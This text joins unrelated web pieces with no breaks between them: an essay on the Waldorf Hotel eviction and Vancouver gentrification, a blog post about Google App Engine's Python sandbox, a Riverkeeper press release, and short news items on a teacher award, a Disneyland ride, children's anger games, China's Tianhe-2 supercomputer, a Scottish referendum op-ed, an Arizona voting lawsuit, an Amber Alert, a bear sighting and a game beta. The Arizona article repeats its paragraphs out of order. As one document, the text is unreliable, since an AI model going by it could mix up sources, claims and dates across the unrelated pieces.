EDITOR'S NOTE | On Jan 20th 2013, the Waldorf Hotel will close its doors to the public. For the last two years, developers have been quietly buying up property along the Hastings Corridor while building support from city councillors. The result has been a dramatic escalation in property values, followed by evictions and rent increases. While evictions are typically poorly covered by mainstream media, the eviction of the Waldorf has been making big headlines. This cultural space, however, has a backstory that links it to other evictions and to the broader neighborhood of which it is a part.
Vision Vancouver and the revitalization of East Hastings
For the past two years the real-estate industry has been aggressively acquiring property in the area east of Clark Drive on the Hastings Corridor. This forward march of developers into the east end, actively encouraged and brokered by Vision Vancouver, has brought dramatic increases in the value of property in the area surrounding the Waldorf. The price of the Waldorf property has increased $1 million in the past year alone. The blocks surrounding the Waldorf site are being consolidated by the Solterra Group, a large property development corporation, with the Waldorf site being the last piece of the puzzle. Solterra, who purchased a table at Vision's recent fundraiser, is run by Vice-President Mike Bosa of the Bosa family of developers, also reliable Vision funders.
Across the street from the Waldorf is 1500 East Hastings. This past year, the entire block was purchased for $5.5 million by Sharam and Peter Malek of Millenium Development, who were bailed out by the City during the Olympic Village social housing betrayal.
Further along the Hastings corridor, the situation is the same. Late last year, despite opposition from low-income residents, local artisans, and sex workers, a massive project dubbed “Woodwards East” by DTES residents was approved. It sits only a few blocks away from the Waldorf site at 955 East Hastings. When 955 East was rezoned from industrial to residential, Downtown Eastside residents and COPE held a press conference predicting wide-sweeping changes to the area after the approval of a rezoning.
History of Solterra on the Eastside
The Waldorf redevelopment is not Solterra's first project in the neighbourhood. On May 7th, 2011, Solterra was granted a development application for a 10-storey condo development at 189 Keefer Street, Chinatown. A year previous, Vision had approved an upzoning policy for the area, as part of the city's new gentrification plan for Chinatown, increasing the value of 189 Keefer from $1 million to $2.9 million overnight.
There was much at stake at the upzoning hearing: on one side stood the working-class community opposed to the project, while on the other side Vision's gentrification plan for Chinatown, and of course Solterra's desire to maximize profits, all hanging in the balance. To remove uncertainty Solterra threw caution to the wind, proceeding to infiltrate one of the most important civic institutions on matters of urban policy: the City of Vancouver's Development Permit Board. On the day the 189 Keefer project was passed, the architectural advisor sitting on the Development Permit Board was Foad Rafii, a paid employee on this Solterra project.
During the hearing, the conflict of interest was raised by DTES residents. The Mainlander reported: “Rafii spoke on behalf of the applicant, and did not publicly disclose his conflict of interest. When a member of the public voiced his concerns, the Board Chair Vicki Potter and Foad Rafii remained silent, refusing to address the public's claim.” The development was approved by Vision Vancouver, despite the conflict of interest.
Solterra is also involved in the notorious Wonder and Palace single-room occupancy hotels in the Downtown Eastside. Mainlander readers will recall that under the previous owner, George Wosley, building conditions were so bad that the city leveled 100s of bylaw infractions and tenants took the owner to court. The owner was forced into receivership in June 2012, at which point Solterra purchased the hotels at rock-bottom prices (the firm which acted as the receiver, Campbell Saunder, had its office on the same floor of the same building as Solterra's downtown corporate headquarters at 925 West Georgia). According to one tenant, pressure on the low-income residents of the Wonder and Palace hotels has only been increasing in recent months.
Creative class alliance
One month after the re-zoning of Solterra's 189 Keefer property, on June 10th 2011, Vision held its pre-election nomination meeting at the Waldorf Hotel. The event was a natural link between an emergent cultural institution and a second-term contender conscious of their roots in the young, creative class of Vancouver. The link was fruitful: a few months later, in the lead-up to the election, Vision hired local promoters Sean Devlin and Cameron Reed to organize a “time-raiser” at the Waldorf to build ground-support for the Vision campaign. Meanwhile the director of the Cheaper Show, Graeme Berglund, was singing the praises of Vision Vancouver from his home base at the Waldorf. By locating the new Waldorf as a space for creative class engagement, Vision increased both its cultural ‘cred' and millennial generation support.
In late October 2011 the Globe and Mail published an article celebrating the revitalized hotel's one year anniversary, calling it “Vancouver's cultural oasis in the middle of nowhere.” In one sentence, the article both erased already-existing cultural spaces a short walk away from the Waldorf (Cedar Root Gallery, The Vancouver Aboriginal Friendship Centre Society, LES Gallery, The Purple Thistle Centre for Arts & Activism, The Dogwood Center for Socialist Education, to name a few), while contributing to a key aspect of gentrification discourse: the notion that nothing of value exists here anyhow.
Today, with news of the sale to Solterra, the ‘nowhere' narrative continues as supporters begin a petition that decries the onslaught of condo-development, since it means losing the Waldorf. The petition celebrates the establishment of this “cultural oasis in the middle of nowhere” while also quoting Vancouver's mainstream poor-bashing magazine, Scout. Low-income people are of course the “nobody” in the middle of this DTES “nowhere,” and the petition seems to suggest that the battle plan for a rescued Waldorf is to strike a new deal with Vision and city hall, rather than forge new alliances with the same people (renters) being evicted by the same developer (Solterra) in the same neighborhood (DTES).
Indeed, the celebrated cultural institution is finding itself in the shoes of last May's Chinatown residents. The difference might be that unlike the low-income residents at the Asia Hotel, Waldorf supporters are still counting on their ties to Vision Vancouver with their petition appealing to Gregor Robertson and Vision for help.
What next?
In addition to being a successful space on its own terms, the Waldorf was explicitly viewed as an institution capable of drawing a more affluent demographic to the east of the Downtown Eastside, home to some of Vancouver's lowest income housing and artist space. The Waldorf frames its role lucidly: “The irony that the Waldorf was taken over by a condo developer in the very area we helped reinvigorate is obvious to anyone.” What remains to be dispelled is the notion that the Waldorf was a lonely pioneer. Gentrification is always a shared class effort, as we are reminded by Peter Wall's statement to the Globe and Mail last January: “We have the Waldorf, Bob [Rennie] has bought that little building; I think it's ripe for change.”
Peter Wall's “we” is a particular we, specific to the developer monopoly in the context of gentrification. The eviction of the Waldorf forces artists and cultural workers to consider the ways in which they are used by forces larger than themselves. It is not a matter of blaming artists for gentrification, but rather taking stock of the ways in which we can choose how to deal with the cards we are dealt. Some have advocated passive submission, since “we can't throw ourselves in the way of the economic locomotive and just hate developers.” But is that approach justified at a time when many cultural spaces are continually lost, and irreversibly so?
On the other side of the equation, some of the people defeated in the Chinatown hearing last May later joined Vision in hopes that “if you can't beat them, join them.” The Waldorf proves that even if you join the development establishment, you still get beat. For this reason, the eviction might be a moment of opening — an ideal turning point for coming to the simple yet difficult realization that gentrification does not discriminate between artists, cultural workers and low-income renters.
In response to the eviction, local artists are calling for a one-off solution to save the Waldorf. It is possible that Vision will make an exception for the threatened Waldorf as an attempt to recuperate its ‘creative class' discourse, but to address the root causes of gentrification another approach is needed. Renters and artists affected by displacement can recognize their shared position and organize together from there — and what better moment than now? The end to displacement ultimately rests on these future ties.
So I promised some more technical discussion of App Engine than my last two posts. Here it is:
Google App Engine uses a somewhat CGI-like model. That is, a script is run, and it uses stdin/stdout/environ to handle the requests. To avoid the overhead of CGI a process can be reused by defining __main__.main() . But while a process can be reused, it might not be, and of course it might get run on an entirely separate server. So in many ways it's like the CGI model, with a small optimization so that, particularly under load, your requests can run with less latency.
This part is all well and good. I've already come to terms with servers going up and down without warning. But the environment itself has a number of other restrictions. It seems that App Engine is providing security in the language itself. The interpreter has been modified so that code is sandboxed, with no ability to write to the disk, open sockets, import C extensions, and see quite a few things in its environment. It's these things that are a bit harder to come to terms with.
While they claim it supports any Python framework, these restrictions don't actually make it easy. So for the last few days quite a few of us have been hacking various things to get stuff working.
The first thing people noticed is that Mako and Genshi didn't work, because they use the ast (via the parser module) to handle the templating, and that module has been restricted. Apparently arbitrary bytecode is not safe in this environment, and so anything that can produce bytecode is considered dangerous. From what I understand Philip Jenvy has been working on Mako and the trunk is currently working. He'd already been doing work to get Mako working on Jython, which had similar issues. Genshi is also in progress and fairly close to working, though with some missing features. Genshi has the harder task as Mako was primarily reading the ast, while Genshi was writing it.
The first thing I noticed is that Setuptools doesn't work. I'm flattered that one of the only 3 libraries included with App Engine is WebOb, but of course I am more enamored of a rich set of reusable libraries. Setuptools didn't work because several modules and functions have been removed — this like os.open , os.uname , imp.acquire_lock , etc. Some of these are kind of reasonable, while others are not. The removal of many functions from imp doesn't really make sense, for instance (I think the motivation was the difficulty of auditing the implementation of those functions, not that the functionality itself is dangerous). And while some functions can't be used in the environment, the fact you can't import those functions is more problematic. For instance, The Setuptools' pkg_resources module has support to unzip eggs when they are imported. App Engine doesn't support importing from zip files at all, and you certainly can't unzip to a temporary location. But withoutthe necessary modules and objects pkg_resources won't even import.
To work around this I started a new project: appengine-monkey, which adds several monkeypatches and replacement dummy modules to the environment to simulate a more typical environment. It's just a small list so far (mostly in this module), but I expect as people experiment with other libraries the list will increase. For example, I would welcome implementations of things like httplib on top of urlfetch in this library. (Implementing httplib and stubbing out parts of socket would probably make urllib run.)
But the good news is that Pylons is pretty much working on App Engine, as is Setuptools and you can manage your libraries using virtualenv.
The instructions are all located in the appengine-monkey Pylons wiki page. Please leave comments if you have improvements or problems with that process. I also welcome contributors and developers to the project itself — this is a project for expediting App Engine development, it is not a project I care to champion or control. Or support to any large degree.
One ticket which is rather important is the apparent maximum number of files and blobs: 1000. Libraries involve lots of files, and the base Pylons install is only barely under this limit. Now I just wish I could use lxml, but that's probably going to be a long time coming.
Update: As of April 2009 these issues were fixed; it took a year, but at least it's done. The 1000 file limit has been relaxed (1000 code plus 1000 static) but still exists. lxml remains unlikely.
Trend in declining spending damaging to our environment, economy and quality of life
FOR IMMEDIATE RELEASE
Contact: Tina Posterli, 914-478-4501 x 239, tposterli@riverkeeper.org
Ossining, NY – September 5, 2013 – The New York State Assembly will hold a public hearing in Albany Friday, Sept. 6, regarding the urgent need to invest in New York's wastewater infrastructure and reverse the unconscionable decline in spending on New York State Department of Environmental Conservation (DEC) programs and staff.
Read Hudson Riverkeeper Paul Gallay's prepared testimony.
The state's own estimate of our growing infrastructure crisis shows that a staggering $36 billion will be needed over the next 20 years to address wastewater treatment needs alone. Disturbingly, these challenges face New Yorkers at the very moment when DEC has roughly 30 percent fewer employees than it did in the 1990s [despite an 11% population rise during those years]. The impacts of these deep and disproportionate cuts are reflected by the shocking decline in actions to enforce environmental laws along the mid- and upper-Hudson [DEC Region 4]. According to DEC data, enforcement “orders on consent” in this region declined every year between 2009 and 2012, from 143 to 80.
There are answers to the urgent problems caused by failing to invest in water infrastructure and our other environmental programs. Bills introduced in the assembly and senate last month would give voters the opportunity to approve $5 billion in bonds to pay for projects that could improve our environment, with $4 billion going toward initiatives to improve clean water resources and sewage infrastructure repair. And, the administration of Governor Andrew M. Cuomo, working with legislative leaders, could check the decline in DEC budgets, by reversing the disproportionate cuts suffered by this key agency over the past seven years.
Following is a statement from Hudson Riverkeeper Paul Gallay, formerly a senior staffer at DEC's Region 2 (NYC) office during the Mario M. Cuomo and George E. Pataki administrations, who will testify at tomorrow's hearing:
“Since 2007, clean water act enforcement and water quality monitoring in our waterways have steadily declined, due to DEC budget cuts, and agency officials warn that more such cuts are on the way. In a climate where 30 percent of our wastewater facilities are over 60 years old and operating up to 30 years past when they were designed to, with further cuts to DEC's water quality programs planned, it's time to stop the slide, which DEC frankly calls a ‘crisis,' and secure the funding necessary to prevent the deep and permanent degradation of our waterways.
“If we do not reverse this trend of declining operational spending for DEC and insufficient investment in our wastewater infrastructure, then New York State's new catchphrase – ‘Open for Business' – might as well become ‘Open for Pollution,' and we'll face a future in which our quality of life declines, impacts to our health worsen and our natural heritage is squandered.”
Maddy Halbach, a financial literacy teacher at the Applications and Research Laboratory's Academy of Finance in Ellicott City, is among seven finalists for Maryland Teacher of the Year.
Teachers from Anne Arundel, Garrett, Harford and Talbot counties as well as Baltimore City were also listed as finalists after being named Teacher of the Year for their school districts. Finalists were selected by a panel of judges from Maryland education organizations representing administrators, teachers, school boards and parents.
Once a winner is selected, the state Teacher of the Year will compete for the National Teacher of the Year award, which will be announced in April 2018.
“I'm incredibly honored and amazed that I'm in that category,” Halbach said. “The recognition is so empowering to me. It gives confirmation to me of a job well done. The reason why I feel unworthy is because there are so many incredible teachers who we have in the county and the state that do amazing things for amazing kids.”
Halbach, who has been an Academy of Finance instructor since 2007, was recognized by the Howard County Public School System in February as the 2016 Maryland Financial Literacy Teacher of the Year. She said she has also trained other teachers on financial literacy.
Financial literacy is crucial to children's education and helping them make “good educated decisions,” Halbach said. Students can then apply this knowledge when making decisions about where they want to go to college and how much they're willing to pay for school, she said.
“When I'm teaching those things, it's real application and getting them ready for college, career and life,” she said. “It takes us five minutes to get into financial difficulties that can take years for us to get out of. Knowing that they're going to walk away from my classroom at the end of the day with a little bit more knowledge to make those good decisions — that's what motivates and empowers me to do what I do.”
Baltimore Sun reporter Liz Bowie contributed to this story.
Disney unveiled plans for its newest ride at Disneyland's California Adventure during Comic-Con in San Diego on Saturday.
An attraction based on one of the 2014's biggest movies, “Guardians of the Galaxy,” is coming to the theme park in 2017—just in time for the release of the franchise's second movie.
But “Guardians of the Galaxy – Mission: Breakout!” is already causing controversy among die-hard Disney fans. The ride is set to replace the iconic Twilight Zone Tower of Terror drop ride, which has been at the park since 2004. Based on the popular 1960s TV show, the free-fall ride combines a supernatural storyline set amongst the backdrop of a 1930s hotel. There's a similar ride at Disney's MGM Studios in Orlando.
The new “Guardians” ride will follow a similar trajectory—fans will be introduced to a sci-fi themed story before enduring a heart-stopping drop to the ground below—but the Twilight Zone fanatics are not happy with the modern rebrand.
#SaveTheTower Share & sign the petition to prevent @Disneyland from destroying the best ride there is 😔 https://t.co/3EpIW15Oep via @Change — alex jacob (@crucifalex) July 24, 2016
Even celebrities are weighing in on the controversy.
NO!!!! TOWER OF TERROR FOREVER!!!!! https://t.co/PgmJ5hoF8H — Sarah Hyland (@Sarah_Hyland) July 24, 2016
According to Disney's blog, guests on the new ride will be guided through an escape mission where, “unbeknownst to their unscrupulous captor, the intrepid Rocket has escaped and is enlisting the Collector's VIP guests for help. Guests board a gantry lift, which launches them into a chaotic and hilarious adventure as they join Rocket in an attempt to break his fellow Guardians out of captivity.”
The ride will also feature songs from the movie's popular soundtrack including hits from music legends like from David Bowie, Jackson 5, and the Runaways.
The current Tower of Terror is scheduled to close early next year to make way for “Guardian”-themed enhancements. The revamped ride could open as early as summer 2017.
Anger is one complex emotion. Anger comes from feelings of frustration, sadness, displeasure, irritation and a host of other feelings jumbled together. The thing is, anger gets a bad reputation; it's just not nice to be angry… Especially children are expected to not get angry, but really anger should not be ignored, forgotten or squashed deep down.
Festering anger can lead to a host of difficulties like sleep problems, headaches, moodiness and low-self-esteem. Learning to deal with our anger as well as helping our children learn to recognize, accept and process their anger is very healthy.
Having healthy outlets to explore and release the feelings is a great way for children to build emotional intelligence. Below are 6 ways to encourage children to deal with pent up anger and discover feelings through creativity and play.
These games are not intended to substitute how you support your child in the middle of an aggressive fit of anger. They are intended as tools for children and parents to explore anger and learn alternative coping ways.
SPLAT!: Gather up some wet sponges, or fill water balloons. Choose a place that can safely become wet like the lawn, shower stall or the bath tub. Throw sponges/balloons against the ground/wall and encourage your child to say something that bothers them with each throw. A child may say “It made me angry when I had to stop painting and eat lunch” SPLAT! “It made me so mad that I had to share my snack with Johnny.” SPLAT! This is a powerful activity for times when angry feelings have become pent up and need some releasing. Play can be started just for the sake of throwing and then eventually move into talking about feelings.
Angry art: Give children some art supplies like paint, crayons or markers and encourage them to create art with their feelings. “Let's draw like the crayon is happy. Now let's draw like the crayon is sad…mad…angry” and so on. The art may turn out to be a specific picture which you can then talk about or just angry scribbles – either way the idea is just to give a chance to put some feelings onto paper.
Rolling Out Anger: If you have access to a grassy lawn, rolling in grass can be incredibly grounding and calming. Encourage children to say something that they are angry about and then have them “roll” out the anger onto the lawn. Children usually end up enjoying the rolling so much they can soon move on from feeling anger into a lot of laughter which is often very healing.
Pillow fight: This is a classic, but it can be such a wonderful release for children to hit mom/dad with a full pillow. It makes children feel powerful and confident, especially if mom/dad tumbles down or waves the pillow case in defeat 😉 It's helpful to set some ground rules before playing like no tackling, no hitting with pillows on the face and everyone should respect the word “Stop”.
Pounding play-dough: Most children love tinkering with play-dough but this game goes beyond sculpting, cutting and modeling clay. Pounding play-dough is about really smashing, throwing and pounding a big chunk of play-dough while being encouraged to vent any frustrations or angry feelings. A final step to finish the process is to after pounding out the anger, encouraging your child to re-shape the play-dough into a shape or sculpture that makes them feel happy again. It's a great exercise in moving through feelings and then moving forward!
Animal Breaths: The way we breathe has an incredible impact on how we are processing our surroundings. When a child is feeling angry, if we can help them breathe through their thoughts, it can be incredibly grounding, empowering and eventually calming. A giant Lions breath with roaring included is a great way for children to release anger. Short, shallow bunny breaths can help children focus again and long snake like slithering breaths are very calming.
During these games, don't worry about solving any problems or offering solutions in that moment, a simple “I hear you” or “would you like to share anything else” can keep the communication open. There may be some tears, laughter and a host of other feelings to go through…try to simply be present and acknowledge the feelings and words your child is sharing and gently guide your child through the activity.
Does your child get angry? How do you support your child in dealing with anger and other big feelings?
Peace & Be Well,
Ariadne
Pin For Later
Looking for more inspiration, ideas and resources for positive parenting? Come join Positive Parenting Connection on facebook!
China has produced a supercomputer capable of 54.9 petaflops, more than twice the speed of any system in the U.S., according to a U.S. researcher who was in China last week and learned the details.
China's latest system was built with Intel chips, but includes indigenously produced Chinese technologies as well. The Chinese government spent about $290 million on it.
China's new supercomputer is capable of 54.9 petaflops. (Image: Prof. Jack Dongarra)
Today, the world's fastest supercomputer is at Oak Ridge National Laboratory in Tennessee. The Cray system was running at nearly 18 petaflops, according to last November's biannual Top 500 list. That list will be updated in mid-June.
With its new supercomputer, China is raising the stakes in supercomputing for the U.S., as well as for Japan and Europe. It is showing a willingness to push for leadership in HPC and the race to develop the next generation of systems, exascale.
Jack Dongarra, a professor of computer science at the University of Tennessee and one of the academic leaders of the Top 500 supercomputing list, posted a detailed description late Sunday of China's latest system ( report PDF ) from his trip to China. His findings are based on a briefing at an HPC conference May 28-29 in Changsha by a Chinese official from the National University of Defense Technology (NUDT).
HPC Wire reported on the new system this weekend.
China's latest large system is the successor to its Tianhe-1A supercomputer, which won the global title as the world's fastest in November 2010. President Obama made note of China's supercomputing accomplishment in his State of the Union speech in January, 2011, where he said the U.S. was facing another "Sputnik moment" in wide range of technologies.
China's latest supercomputer, called Tianhe-2 or Milkyway-2, has 32,000 multicore Intel Xeon Ivy Bridge chips, and 48,000 Xeon Phi chips, a co-processor based on Intel's MIC (Many Integrated Core) architecture.
Each Phi processor is capable of more than teraflop of speed, or one trillion floating point operations per second. A petaflop is 1,000 teraflops, or one quadrillion floating-point operations per second. An exascale system is 1,000 petaflops.
Dongarra's report suggests that China may have the leading system for some time. "The next large acquisition of a supercomputer for the U.S. Department of Energy will not be until 2015," he wrote.
China has been developing its own chip technology and has been mixing and matching homegrown tech with imported components. U.S. researchers believe China is heading in the direction of building a supercomputer made entirely of indigenously produced components, including chips.
The approach of combing China-built technology with American products, is evident in Tiahne-2.
"There are a number of features of the Tianhe-2 that are Chinese in origin, unique and interesting," said Dongarra, in his report. These include a proprietary interconnects, and the Galaxy FT-15, a 16-core processor. He cited the "apparent reliability and scalability" of the system as well.
The system's power usage, when cooling is considered, is 24 MWs. Power is major issue in achieving exascale. Researchers could assemble, theoretically, an exascale computing system with current technology. But at a billion or so cores, it would need its own power plant to operate.
To reach exascale, HPC researchers say they need to develop processors, memory and network components that substantially reduce power use. New programming models are also being developed. The problems in achieving exascale are such that Europe, which is investing heavily in its own HPC effort, believes there is a potential to leapfrog the U.S. if breakthrough approaches are discovered to some of these problems.
U.S. researchers, as recently as last month, warned Congress that the U.S., while the undisputed leader in HPC today, is at risk of falling behind in HPC development unless it commits hundreds of millions of dollars to exascale research. But the ongoing budget dispute and sequestration is leading to a reduction in R&D spending.
China wants to produce an exascale system before 2020. The U.S., at its present effort, won't produce an exascale system until around 2025, lawmakers were told last month.
Patrick Thibodeau covers SaaS and enterprise applications, outsourcing, government IT policies, data centers and IT workforce issues for Computerworld. Follow Patrick on Twitter at @DCgov, or subscribe to Patrick's RSS feed . His email address is pthibodeau@computerworld.com.
It is the love that rarely speaks its name. For it is now unfashionable to talk of love of country, particularly as we prepare to mark the beginning of the first world war's four years of horror. But it is for love of the country of my birth that I shall vote no in the Scottish referendum on 18 September.
In pre-referendum Scotland it is necessary to state one's qualifications for publicly joining in the febrile and sometimes abusive debate about Scotland's future. One Scottish MSP has said that those who oppose independence are anti-Scottish, hence the need for me to establish credentials. I was born in Scotland, my parents were Scottish, I went to school and university in Scotland, I married a Scot, I qualified in and practised law in Scotland, I represent a Scottish constituency, and I am the chancellor of Scotland's oldest university.
I yield to no one in my love of my country. I shall vote no not because of uncertainties about membership of the EU or Nato, or the possibility of a currency union, but because I am unflinching in my belief that it is neither in the interests of the United Kingdom nor Scotland that we should separate. To do so would be to diminish both.
The advantages of the present union are often obscured by the smoke of the debate. For 300 years we have enjoyed the benefits of a single market. We have lived at peace with each other save for the last convulsions of Jacobitism in 1745. We have neither suffered invasion, nor civil war, fascism or communism. Look around you and see how few countries can make that claim. We have lived in a political system envied and copied around the world. We are members of the EU, Nato, the G7 and the Commonwealth, and have a permanent membership of the security council of the UN.
Nor have we lacked a Scottish political voice in the UK. We have been given a parliament and a referendum has been confirmed. In recent times David Steel, Robin Cook, Malcolm Rifkind, John Smith, Gordon Brown, Charles Kennedy, John Reid, Alistair Darling and others have occupied the great offices of state or led UK-wide political parties. And three Scots, James Mackay, Derry Irvine and Charlie Falconer have become, in turn, lord chancellors of Great Britain. Scotland and the Scottish have enjoyed influence beyond our size or reasonable expectation and in our UK, governments change seamlessly and without rancour. Our human rights are protected, we have a participative democracy, and the rule of law is our very foundation.
Movements for independence are often based on some form of discrimination – ethnic, religious or economic, a democratic deficit perhaps, or persecution or institutional prejudice. None of these has blighted Scotland's relationship with the rest of the UK. Has it been perfect? Of course not, but every few years we have had the unfettered choice to change course at successive elections. We invented the NHS, created the welfare state and, more peacefully than others, divested ourselves of our past to the extent that former colonies and dominions have morphed into a Commonwealth that even countries with no historic connection with the UK want to join.
In Scotland we have kept our own legal system, our church and even the right of our football team to play in the World Cup. Now we are invited to give up that history and the continuing opportunity it allows us. We are asked to make a decision that may be reversible in principle but in practice will be, to all intents and purposes, perpetual; to give up intangible benefits such as shared values, mutual respect, common responsibilities and family ties.
A decision in September to leave the UK will bind our successors for generations to come. Are we not entitled to clear and unequivocal evidence that to do so would do more than satisfy the ambition of one political party? Are we not entitled to be confident that we can meet the uncertainties of currency and of membership of international institutions? Do we not require evidence that an economy based on unpredictable oil reserves and revenues can be sustained, with promises of high public spending and low taxation? None of these assurances is available. Even on the balance of probabilities, the case for independence has not been made.
But those, like me, who exercise our right to argue against independence also have a duty. And that is to recognise that the majority of Scots still prefer a solution that allows Scotland to remain in the UK but for its parliament to have greater powers, most particularly economic. The Conservatives, Labour and Liberal Democrats publicly acknowledge this reality. They differ in nuance and detail, but not in principle.
The promises of the SNP are incapable of achievement, but it chooses to challenge the good faith of the three parties in their undertakings to embrace that principle. Its challenge would be effectively blunted if the three parties could agree on the process of implementation of that principle.
The secretary of state for Scotland should, in the event of a no vote, convene a meeting of representatives of these parties within 30 days of the vote. The parties should undertake to enter into heads of agreement, and put their proposals for greater powers for the Scottish parliament in their manifestos for the 2015 general election. And if in government, in whole or in part to introduce the appropriate legislation in the first Queen's speech after the election in May 2015. This would be the best and most practical demonstration of Better Together and "the best of both worlds".
Maricopa County elections chief Helen Purcell issued a mea culpa just after the Arizona elections, but has rebuffed calls for her resignation. Purcell said that she had pushed for fewer polling locations to save money, and had expected that many more voters would submit their ballots by mail than actually did. "We certainly made bad decisions," she said. "It was my fault."
The lawsuit alleges that minority voters, who typically vote Democrat, were most affected by the lack of polling locations. "[Arizona's] alarmingly inadequate number of voting centers resulted in severe, inexcusable burdens on voters county-wide, as well as the ultimate disenfranchisement of untold numbers of voters who were unable or unwilling to wait in intolerably long lines," Democrats argue in the lawsuit.
The lawsuit focuses on Maricopa County, which includes Phoenix, where some voters waited in congested lines for as long as five hours before being allowed to vote in the primaries there on March 22. Elections officials in the county cut polling locations by 85 percent from the 2008 presidential election in order to save money, resulting in overwhelmed polling locations on election night last month.
Hillary Clinton, Bernie Sanders and various segments of the Democratic Party will file a lawsuit on Friday over alleged voter suppression in Arizona, the Washington Post reports.
Read more
Hillary Clinton, Bernie Sanders and various segments of the Democratic Party will file a lawsuit on Friday over alleged voter suppression in Arizona, the Washington Post reports.
The lawsuit focuses on Maricopa County, which includes Phoenix, where some voters waited in congested lines for as long as five hours before being allowed to vote in the primaries there on March 22. Elections officials in the county cut polling locations by 85 percent from the 2008 presidential election in order to save money, resulting in overwhelmed polling locations on election night last month.
The lawsuit alleges that minority voters, who typically vote Democrat, were most affected by the lack of polling locations. "[Arizona's] alarmingly inadequate number of voting centers resulted in severe, inexcusable burdens on voters county-wide, as well as the ultimate disenfranchisement of untold numbers of voters who were unable or unwilling to wait in intolerably long lines," Democrats argue in the lawsuit.
Maricopa County elections chief Helen Purcell issued a mea culpa just after the Arizona elections, but has rebuffed calls for her resignation. Purcell said that she had pushed for fewer polling locations to save money, and had expected that many more voters would submit their ballots by mail than actually did. "We certainly made bad decisions," she said. "It was my fault."
Related: Phoenix Mayor Asks Justice Department to Investigate Alleged Voter Suppression in Arizona
The lawsuit is being brought by the Democratic National Committee, the party's Senate campaign committee, the state party, the campaign for Rep. Ann Kirkpatrick, the Democrat who is challenging Sen. John McCain, and several individuals who were affected by long voting lines in Arizona. Democratic officials told the Post that the Clinton campaign will join the lawsuit after it is filed on Friday. Sanders' campaign announced Thursday after that they, too, will join in the lawsuit.
"The handling of the primary election in Arizona was a disgrace," Sanders campaign manager Jeff Weaver said in a statement Thursday afternoon. "People should not have to wait in line for five hours to vote. How many people were turned away? What happened in Arizona is part of a pattern of voter disenfranchisement by Republicans."
Clinton campaign manager Robby Mook echoed those sentiments in a statement earlier Thursday. "Hillary for America is committed to fighting for all voters to be able to exercise their fundamental right to have their voices heard in this election. We share the concerns of Arizona supporters of both campaigns who encountered barriers and appreciate the DSCC and DNC's willingness to let us join the case as a party," Mook said.
The legal challenge comes just days after election watchdog and lobby group Americans United for Democracy, Integrity, and Transparency in Elections (AUDIT-AZ) filed a lawsuit in Maricopa County Superior Court demanding a partial recount of ballots from the Arizona primary.
In the lawsuit, John Brakey, the co-founder of AUDIT-AZ, accused election officials of misconduct, including cutting back the number of polling stations by some 85 percent from 2008 to save money. Brakey estimates that voter suppression tactics and poor election procedures cost some 150,000 people in Maricopa County the ability to vote and "altered the results of both the Democratic and Republican primaries," the Phoenix New Times reported.
Clinton won the Democratic primary in Arizona last month, but the Democratic Party's lawsuit that she and Sanders are joining looks forward to the general election.
The lawsuits follow Phoenix Mayor Greg Stanton's letter to US Attorney General Loretta Lynch calling on the Justice Department to investigate alleged voter suppression tactics. Stanton, a Democrat supporting Clinton, wrote the letter the day after the Arizona primaries, arguing that the polling locations in his county were congregated in predominately white areas, although Phoenix is a majority-minority city. Stanton called election night there a "fiasco."
"My request comes on the heels of consistent activity that has created a culture of voter disenfranchisement in the state," Stanton wrote in the letter.
The Justice Department opened an investigation into the matter earlier this month.
Related: Jane Sanders Says Bernie Will Vote for Hillary If She Wins the Nomination
Democrats filing the new lawsuit on Friday are hoping to resolve these issues before November 8. But, as the Post notes, these kinds of cases can take a long time, and the "Purcell doctrine" encourages courts not to post decisions affecting elections too close to Election Day.
The suit could also have an effect on Kirkpatrick's campaign, which is also party to the lawsuit as she seeks to unseat McCain this fall. Kirkpatrick trailed McCain, who has served in the Senate for almost 30 years, by just a single point in recent polling. The seat is a major target for Democrats this year as they try to take control of the Senate.
VICE News correspondent Liz Fields contributed to this report.
Update: This story has been updated with the news that Sanders' campaign, too, will join in the Democratic lawsuit against Arizona.
OTTAWA — A nearly 24-hour search for a six-year-old Quebec boy is over.
The Quebec Provincial Police says Louka Fredette is safe and his father is in custody.
The Ontario Provincial Police stopped Ugo Fredette in Griffith, about a half-hour southwest of Renfrew around 5 p.m., Friday.
Officers had been looking for the 41-year-old and his son since about 5:35 p.m. Thursday.
That's when Louka's mother, Veronique Barbe, was found dead in a Saint-Eustache, Quebec home.
Investigators then followed a trail which first took them to Lachute, near Montreal, where they found an abandoned Ford pick-up truck in Fredette's name.
The father was seen in Maniwaki Friday morning between 8:30 a.m. and 10:30 a.m., and then Napanee, using an ATM machine near a Canadian Tire around 2:15 p.m. Friday.
The happy end to the search continues a successful streak of Amber Alerts dating back to 2003.
Please enable Javascript to watch this video
HENRICO COUNTY, Va. (WTVR) -- Henrico police are sounding the alarm after receiving several calls about a black bear in the western part of the county.
A chance sighting this morning was just long enough for the above picture to be taken of a young bear crossing Tunbridge Road, in the Whitaker Woods subdivision.
It was one of a half-dozen bear sightings in Henrico County in the last few days, and follows other recent sightings in Petersburg and Prince George County.
Henrico police Lieutenant Linda Toney said Wednesday that the animal was also spotted near Lauderdale Drive and Patterson Avenue, Pump Road and Falconbridge Drive and the 11600 block of Gayton Road.
Police say the last call they got for a bear sighting, was about 12:45 Wednesday, near Gaskins and Quioccasin Roads.
Toney said Animal Protection Unit officers are in the process of searching for the animal.
If you have seen the bear, please call the Henrico Police Communications at 804-501-5000 or 911. Email photos to pics@wtvr.com, or post a message on the CBS 6 Facebook page. You can also add a picture to our gallery below by clicking the "submit your photo" button.
Here are some reminders about bears from the Virginia Department of Game and Inland Fisheries:
Respect the bear's space.
If the bear is on or near your property, do not escalate the situation by approaching, crowding around, or chasing the bear. This also applies to bears that have climbed a tree.
The best thing you can do is leave it alone.
Bears are naturally afraid of humans and will look for escape routes.
Stay with CBS 6 News and WTVR.com for updates on this story.
Battlefield 1 open beta has an end date on Xbox One, PS4 and PC
UPDATE 2: Express Gaming can confirm that the Battlefield 1 open beta has ended.
An EA spokesperson confirmed that the open beta ended earlier this morning, while EA Support has posted a message thanking fans.
"Hello Battlefield fans!" reads an EA support post. "Thank you to everyone that participated in the Battlefield 1 Open Beta.
"The beta has now ended and you'll no longer be able to join any games."
UPDATE: EA and DICE are taking requests for a new Battlefield 1 map on the game's forums.
Asked if the Battlefield 1 beta would get a new map, EA said: "We are taking suggestions for a new map here," before linking to the forums.
"We understand. Can you please add your request for a new map here."
ORIGINAL STORY: Battlefield 1 publisher EA has announced the official end date for the shooter's open beta on Xbox One, PS4 and PC.
According to an announcement on Twitter, the Battlefield 1 open beta will end on Thursday, September 8.
